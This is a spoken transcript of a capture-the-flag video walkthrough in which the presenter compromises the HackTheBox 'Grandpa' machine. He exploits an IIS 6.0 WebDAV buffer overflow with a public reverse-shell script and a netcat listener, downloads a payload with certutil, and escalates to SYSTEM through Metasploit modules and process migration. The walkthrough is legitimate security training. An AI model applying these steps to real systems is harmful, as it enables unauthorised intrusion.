Hey, what's up everyone, and welcome back to another episode of Naked CTF. I'm Jono from OpenLearnSec, and in the Naked CTF series, I will attempt to compromise and own a server from HackTheBox. This is my first attempt. I've not solved the box beforehand, nor anything about it. It's done one take with no editing. This could be 30 minutes or 3 hours, so let's go. Today we're doing Grandpa, which is an easy Windows box. We've got our IP here. It was just launched a minute ago. Let's get ourselves organized, up and running. And we're going to run CTF prep, CTF HDB, the name of the box, which is Grandpa, and then the IP address. That's going to set everything up for me. That's what automation is all about. And we'll open up our notes here, our blank template. Grandpa, let's go. I am going to use a slightly different nmap command because the aggressive just is a little bit too long, I think, for these particular CTF box exercises. I will talk about that a little bit later. Grandpa, let's go. Nmap minus all ports, connect, versioning, P4, timing, verbose, output, nmap1.txt, and our IP address, which is set up by our automation. And off she goes. So far we've got port 80. Look, for just a little word on enumeration, right? Obviously, I want to try and balance, good enumeration with time, basically. So I know that under like OSCP exam conditions or something like that, excuse me, having a sip of my coffee, that you really need to do thorough recon and enumeration, right? Because you can't afford to miss a thing. These CTF exercises on HackTheBox, especially on the easy end of the spectrum, I feel are pretty dependable in the sense that they're usually always TCP, so I don't do any UDP scanning, and there's usually a small number of services. Not always. Some boxes have a large number of services open that forces you to really go deep on your enumeration. And so I try and do this in a way where I don't have to do any work before I start recording. So I don't want to run like a 45-minute enumeration exercise. When it comes to the real world, where you're enumerating across potentially subnets rather than single IPs, and you're looking for different combinations of things, or a different scenario when you're in the OSCP exam and you really can't miss anything as obscure as it might be, there's definitely a more thorough way to do enumeration, right? And so I will produce a video on the thorough enumeration, which is essentially auto recon, which is what most people do for their OSCP exam. But for now, getting these CTF exercises done, I'm pretty certain that, just running this basic recon is going to be good enough. There's probably going to be a point when I'm especially moving into the medium or hard or insane boxes where you really need that deep enumeration happening. But for now, this is fine. So all we've got is one port. And what's it telling us? It is Microsoft IIS 6.0, which from memory is like really old. It has WebDAV enabled, which is interesting. So WebDAV would let us effectively browse file systems depending on the configuration. The home page has a title under construction, and it's just HTTP. It looks like all of the HTTP verbs are available. And then it's even flagged potentially risky methods, trace, copy, prop find, search, lock, etc. All right, so not a lot to go on here. So we're going to do casual browse of website. We're going to do, let's just make this clear that we're doing it on HTTP port 80. Directory and file enumeration. Okay. Let's grab the IP. Let's chuck it in a browser. Let's force our HTTP protocol and under construction. Now, I can tell this is a really old web server. Like this icon, these fonts, this default homepage, start, run, iNet manager, like holy moly. Yeah. Internet Information Server 6.0 wiki. Internet Information Services, yeah. IIS 6 was included in Windows Server 2003 and XP Professional x64 edition. Like, that is old. That's like 20 years old, I think. Considering 6.0 and now they're on 10.0, which is in Server 2019. Okay. So what do we do? So, I mean, IS6 abuse, like, since July 2016, attackers, yeah, have been using a 0-day in IIS. Wow. I mean, okay, so that article is 2017. Okay, maybe it's not 20 years old, but this is a... Let's have a look at hack tricks. I have visited the page before. So this is all about enumeration. Let's get some... Let's get some enum going while we're here in case it is like there's an application installed somewhere. IP fuzz user -w user share word list sec lists discovery web content directory 23 small. Go. Oh, and that's right. Need the full width of the terminal, otherwise it goes crazy. So we'll let that go. Discovery brute force, leaking source code, downloading DLLs. Enumerate folders and files in every discovered folder. Okay. Debugging, enabling debugging. There's nothing specific in hat tricks for 6.0, so we'll close that for now. Let's just look up CVE. Oh, okay. CVE details is down. Nope, DNS is gone. I'd like to see a list of CVEs. So nothing on the directory enumeration. Let's have a look at raft. Large, medium. Yeah. Give that a try. Let's clear all this up. We don't need this anymore from the last session. Gotta say, I was a little bit traumatized by the last video. Absolutely got kicked around by that particular vulnerability. Just not being able to establish a reverse shell. Has my networking gone down? No. In google.com. Oh, my DNS has stopped. Oh boy. etcresolve.com. Yeah, I don't want to mess with that. And let's look up google.com. Okay, I'm just gonna mess with it for now. Let's add, oops, we need sudo. Name server. I'm going to use a local name server that I have. Ping google.com. Okay, that's better. Not sure what happened there, but it is what it is. I will try and figure it out later. CVE details. So look, there's a 10. It mentions WebDAV. All right, okay. I think this might be our horse to back. So let's sort it by CVSS. I like the fact that this has got the public exploit tag. FTP, which is part of IIS, but not enabled in this case, or not listening on the internet. So I want to have a look at this guy to start with. So let's have a look at it. It's a buffer overflow in the WebDAV service. Storage path from URL, so like some local resolver to take the URL and figure out what the actual file system path is, I believe. So we're going to need to find a exploit, or at least test an exploit. So, is there a MS bulletin? Because what I find is, yeah, okay, Metasploit module. Let's just have a look. This could be, let's create some notes as we go. Looks like default website, nothing remarkable on simple dir file enum. Very old IS 6.0 reported, WebDAV reported as enabled. So let's do search exploit, and then the CVE. So this is kind of like something that's a bit annoying, is that the CVE And Microsoft has their own MS bulletin number. Or their own advisory number, I think. IIS. This looks like a... I mean, this was around the time of WannaCry. IIS. So what is the bulletin number? Because that's what I want to know. Release patches. Yeah, so I think this vulnerability was actually found like many, many years after XP and etc. was sunset. But it was deemed critical enough. Vulnerability. Let's just do the CVE. Exploit. Here we go. Code crafter. Reverse shell.py. Okay. Looks pretty straightforward. Here's the shellcode for the buffer overflow, which I assume will give you the reverse shell. Shellcode for the reverse shell. That is the stuff that's way out of my league. So that's the actual buffer or binary exploit itself. So creates a socket, connects the target, assembles the payload, uses this prop find verb, which I assume is part of WebDAV, and then adds all the cool stuff, sends it, and yeah. So it doesn't actually open a listener for you. It looks like you just run it yourself. You run the listener yourself. So let's do this. NC NVLP 1337. Oops. And then we're going to go up here. We're going to do vim is6 exploit.py. Paste all that in there. Close that. Run that. Okay, so we're going to do target IP is IP, port 80, reverse IP is ton 0, and reverse port is 1337. Maybe Python 3 will do the trick. Nope, there's something wrong. Missing parentheses in call to print. Line 6. Yeah, so it's a... So let's just do this. Do this. And do this. Yeah, okay. Are we missing sysstruct socket? Nope. Why is it complaining? Hmm. 2.7. Ah, there we go. Okay. Okay. And there's our shell. We've popped that. And who am I? That's going to be the fastest root flag ever. 20 minutes. Holy hell. I mean, I kind of knew IIS was old and busted. So that's why I just went immediately there. So we want to go documents. That's how old it is. It doesn't have the users folder anymore. Let's have a look at Harry. Oh, Harry is denied. Administrator. Access is denied. Interesting. Who am I? NT Authority Network Service. Not system. It is a little bit different. So maybe there is a privesc that needs to happen. Who am I /priv? Impersonate. So we could try the old hot potato. Hot potato, hot potato. What are we on? Are we on? This guy doesn't need to stay open, does he? Oh yeah, maybe he does. We are on x86 base PC. Microsoft Windows Server 2003. Hostname Grandpa. So the issue is that we don't have root. We have the network service within NT Authority. And this looks to be a 32-bit version of Windows, not a 64-bit. Which is annoying. Because what that means is that a lot of the privesc or vulnerabilities or exploits or kernel exploits or anything, 32-bit version, you know, it's always a bit of a... Anyway, okay, this is not over as quickly as I thought. Let's have a look and pivot from NT Authority Network. Who am I? Jean Valjean, network service. Or privesc. From network service to system. The last one in order time, principal for is promoting it dangerous / useful because it only relies on the spooler service. In Windows 10 and Windows Server where WinRM is not enabled, you can use our rogue WinRM listener in order to capture a system token. Okay. And of course, in Windows Server versions 2016 and Windows 10 up to 1803, our rotten and juicy potato is still kicking. This is what I was initially thinking, the potato attack, but Last time I tried this on 32-bit, it just didn't work. In this post, I'm going to show you how it's possible to get system privileges from network service account. If you can trick the network service account to write a named pipe over the network and you're able to impersonate the pipe, you can access the token stored in the RPC's SS, which is running as network service and contains a pile of treasures, and steal a system token. Okay. Okay. I mean, this doesn't talk about this is a technique, it seems. It's not a specific vulnerability. Okay. I'm going to try this, but I'm also not going to spend my time trying to figure out all of the possible options here, because what I've discovered with some of these easy window boxes is that the intention is to get you to use Metasploit, and you can do a lot of screwing around on your own when really you want to just use kind of Metasploit and get it over with. So let's move this network. What was it? Networks, downloads, network, and let's just call it nsc.exe. Let's do Python 3 http server. Then on here, do we have cert util, PowerShell, PWSH? No. Okay, so we need cert util lol bin lolbas. So download and save. Yeah, this is the one. So let's get ourselves into a good directory. Temp. Okay, can I touch? No. I don't know if I'm going to have rights, so can I just do... Okay, that's good enough. Cert util Earl cache split -f http 10.10.14.4 /nsc.exe nsc.exe. That's because I didn't include the port number. Silly me. Split -f http :10.10.14.4 8000 nsc.exe nsc.exe. Huh? What's What's wrong with that? Man, failed. Do I need to wrap the command? The URL, sorry. Split -f echo from 0 10 10 14.4. That's right. Okay. http://10.10.14.4 port 8000 nsc.exe nsc.exe. Okay. Split -f. Let's try this one. Cert util verify CTL. No, the URL cache split normally works for me. So we're trying this one just to be clear. Verify CTL -f -split -f -split URL 10.10 14.4 8000 nsc.exe nsc.exe. Yeah, I think this is like a like an old version of cert util. So yeah, I think this is too modern. Let's have a look. Download. No. Lolbass. What other download options are there? Cert OC. Text formatted files. No. That's for a local SMB server. It will download a remote payload and place it in inet cache. Config security policy. Nope. Config security policy. At least it's not in my path. All right, this is what I mean. I'm going like way off the beaten track here. So let's do this. Let's exit our session. Exit. Let's fire up this guy. Let's kill this because we're going to need to rerun it. And let's see if I'm a little bit more, what would you call it? Fluid with Metasploit this time around. So the plan here is use this exploit. I mean, I don't even need to do that, do I? Because there'll be an equivalent in here. Sorry, I just need to make this a little bit wider. Let's NTL, no, 2017 storage path. Yep. So use 5. So while we did find a working exploit, we're going to show options. We're going to, let's just kill this. We're going to set the R host and the L host. Set R hosts is going to be 10.10.10.14. L port is fine, don't really care because it will handle it. It's already got the payload set for Meteprata. And set L host is going to be ton 0. And then should we run or should we be a hacker and exploit? Okay. So, might not be the exact same shellcode that I was using before to test, but oh, didn't work. Interesting. Let's just make sure I didn't screw it up. Ten 14. Port 80. Yeah, I think maybe the Metasploit module. Show IIS web dev. Nope, that's not what I wanted to do. Goodness gracious. Maybe there's an alternative version that has better success. Search IIS web dev. Rank manual. Check. Yes. Search storage path. Yeah, that's the only one. Use 0. Show options. Set our hosts is 10.10.10.14. R port is 80. SSL is false. vhost is none. There's no name. Set L host is going to be EA 10.10.14.4 10.10.14.4. Show options. Okay, I'm happy with that. So it's listening on 4444. All right, so I think what we'll do is use Windows search Windows interpreter. Here, reverse OSCP. So what's the basic one? What's the payload? Use Windows Meterp to reverse TCP. Yeah. Show options. Set L host is 10.10.14.4. And then I'm going to use not my exploit, but the other exploit that I downloaded. To set up a session. So it's going to be Python 2.7 Control D. Target IP is IP. Target port is 80. Reverse IP is /0. Reverse port is going to be 4444. What? Internal server error? Bad key. What the hell? IS 6.0. Bad key. Oh dear, I think something broke, so I'm going to recycle the box. It's only me playing, you can just reset it. Maybe that's why this exploit was failing. So let's go back, search IIS WebDAV, use 5, go options. Options are still good. We'll wait for it to reset, then we'll try the Metasploit. Again, because it's easy just to initiate and then convert it to Meterpreter from Metasploit itself rather than using an external exploit. Let's see. I don't know. Maybe that's the problem, is it was complaining about not being able to create a reverse session because IS was throwing up some error. So we'll give it a try in Metasploit first. And see where we go from there. Oops. Alright. So it's got an IP. Let's try it. We should get the under construction. There we go. Let's just give it 10 more seconds to make sure everything is started up service-wise. Bad key. That was weird. Let's close that. And let's run. Yeah, that's better. I can't remember the path, but in meta... Oh, I can just search for it. Okay. So we're going to background that session. Yes. Then we're going to search for local exploit suggester. Use 0. Let's fill this off. Let's make it a bit bigger. Show options. No. Let's use 0. Show options. Sessions -L for list. Set. So with this local exploit suggester, set the session to 1. Then run. Give that a minute. So it's going to give us some potential exploits that might work for Privesk. While we wait, let's go over to this guy. Server is vulnerable to this CVE. Allows to pop a shell as context. NT authority network service. Okay. Worked using POC exploit code from this guy, code crafter. From here, also able to exploit from Metasploit. So now we're at the Privesk point of view. Let's have a look. So it's going to give us a bunch of stuff. 41, yeah? And the ones that we really care about are potentially vulnerable. So let's just filter this list 1 through 6. Control C. And let's put that into our Privesk notes. Metasploit local exploit suggester. And really, MS16016 WebDAV. MS16016. That's not the same as what we've been dealing with, right? However, if you run this exploit from shell connection, not a remote desktop, the result will be getting a privileged shell in a new GUI window. So, okay, let's discount that one for now. TCP IO CTL. Let's have a look at this. If I can copy and paste it. Exploit DB. Windows 2003 SP2 TCP IP blah blah blah. Privileged shell execution. The system shell will spawn within the existing shell. That's what we want. Yeah, let's try this. I mean, look, I normally would try and understand the exploit itself, but this is, you know, like actual binary exploitation, and it's kind of above my pay grade. At the moment, I do want to get into binary exploitation. I do know the fundamentals, but this is like, look, this is complex, okay? So I'm just going to be a script kiddie and go use 3. Sorry, I'm going to, you can't actually do use from here. So I'm going to do search, use 0, show options, session, -L, sessions, -L, still session 1, set, session, set session is to 1. Then the payload is going to be set L host. Can we do this? G set? Set G? Yeah. Set G. L host 10.10 14.4. And let's use a different port because the current interpreter session is running on 444. So let's just do 445. Run. Access is denied. Okay, maybe it's not that one. So let's say no. Does not work. What about this guy? Hit trap. Exploit DB. User mode to ring escalation. Sounds cool. Windows NT GP trap handle that allow users to switch kernel stack. Oh, this is old, 2010. Wow, this is related to backwards compatibility for 16-bit applications. Believed to affect every release of the Windows NT kernel from Windows NT 3.1 up to and including Windows 7. Oh my god, so that's what? Yeah. 20-year-old code. Okay. Affected all 32-bit, okay, x86 versions. That's good. So we're definitely in the ballpark. Windows Server 2003, 32-bit. Let's go. So search this module, use 0, show options, set session is 1, set L port is 4445, and run. It's the same error as before. Rex exploit failed. Rex post interpreter standard API sysconfig get SID. Yeah, it's the same error as that. First vulnerability we tried. So I'm wondering if I've got something funky going on locally. Post module exploit suggester kills session. Oh my goodness, I am such a fool. Session. I killed the exploit, so the session went away. I wonder if I can just re-establish it. Yeah, because I had to use my... Did I end up using my version? No, I didn't. So sessions minus I1 shell. So it's still there. Who am I? Yeah, okay. Network service. Background, yes. Sessions minus L. If I try to use that, I've tried to to verify, make sure I followed several guides on HackTheBox. Okay. Not enough issues. Debug command. Okay. Oh, Granny, not Grandpa. No, this was never resolved. Oh my god. Umlauts in Windows username. Denied. That's a different error. Oh my god. See, other people who've done write-ups of Grandpa are... Oh, they're all having the same issue. Yeah. Okay. No, no comment. Oh, hang on. You no longer need to do shell to interpreter, as MSF automatically gives you a interpreter shell. We advise downgrading to MSF5 due to MSF6 being a broken mess. But that's 4 years ago. Shell to interpreter is malicious. Oh boy. I'm gonna have to look. I'm gonna close my eyes. Because otherwise I could be chasing this issue for a long time. I particularly feel like trying to figure it out right now. And let me guess, my networking has died as well. Nope, still good. Oh, this is in another language. It's in Japanese. Okay, maybe that other comment was right, that it's it is actual exploit failure. I don't know. Let's try another one. So, did not work. Let's try this one. Exploit DB. Null pointer dereference in win32k.sys. Okay. I mean, let's give it a go. MS14058. Just use that to find the module. Use 0. Show options. Set session is 1. Set L port 4445. Run. Oh my god. Yeah, every exploit is failing with the same. After hours of hassle. Let's see. Looks like that website is offline. Let's see if it's in archive.is. It's probably not offline. It's probably just my local networking is playing up. Why can't you get the cached version anymore? Used to be the best part about Google. Wayback Machine. Oh, not September 11. No, we want to search the web. All right, it's got a archive, which is cool. 2023, September 22. Let's have a look. Okay. Yep, that worked. We got that. Yeah. So this guy tried Juicy Potato. Last resort, Metasploit. Yeah. Possible to migrate from process to execute metinterpreter commands. We spawn on a process that didn't have enough privileges. That's why our exploit were not working. Ah, okay. So if we do session minus I1, sessions, we do PS, and we want to migrate the Meterpreter reverse shell into an existing service that runs as NT Authority network. So let's migrate to 1960, which is WMI provider. Okay. So it was running in run DLL, but it didn't have, the actual parent didn't have NT Authority. Now, yeah, okay, that kind of makes sense. So let's background that. And let's run this. Yeah, there we go. Okay, that is a really good note that we want to capture. Let's put it in here. Migrating Meterpreter to different PID under certain circumstances. Okay. Now we have a new session, so we can go session minus I2. Why do I not pluralize it? Sessions minus L. Oh no, we're already in it. We're already in the Meterpreter. Duh. Shell. Who am I? Who am I? NT Authority system. Okay, so we got Privesc. Boom. Let's go back. Documents and set. Okay. Documents and settings. I think Harry has the unprivileged, the user token. As always, usually on the desktop. So type user.txt. Let's grab that. Let's go back here. Jam it in there. And then let's go to the administrative user. PRAPOR. Desktop. dir. Type root.txt. Grab that guy. Put it in there. Hit submit. And boom! We have owned that box. That's pretty cool. All right. So let's quickly recap. We're at 1 hour, 8 minutes. Ran into some interesting issues along the way. Again, the box is designed in a way that it wants, you know, you ideally meant to go down the Metasploit funnel, right? I am trying to avoid Metasploit while I really like it as a tool, and I'm getting a little bit more and more familiar with it. I want to avoid it because for my immediate needs, it's not the right path to go down. I'd rather be running exploits myself, learning the ins and outs of how that exploit works, like kind of the, you know, the researcher mindset. And like I keep saying, I'm going to put out a video about this, talking about Metasploit and what my thoughts and everything else are. But this particular box, yeah, the path is, you know, you kind of have everything that you need within Metasploit, with the exception of that one weird kind of issue where the initial foothold exploit, which was the IIS WebDAV, needed, the Meterpreter process needed to be migrated to a new process ID, because the process ID that it was running under run DLL 32 didn't actually inherit the, NT authority network service context correctly. I don't fully understand, but it kind of makes sense because the user context was not in the process list at all. So yeah, Grandpa has been pwned. It was a lot of fun. Learned some stuff. Got some notes to take away. So if you stuck around to the end of this video, thanks very much. Have a great morning, great afternoon, evening, nighttime, whatever time it is for you, and I'll see you in the next video. Bye-bye.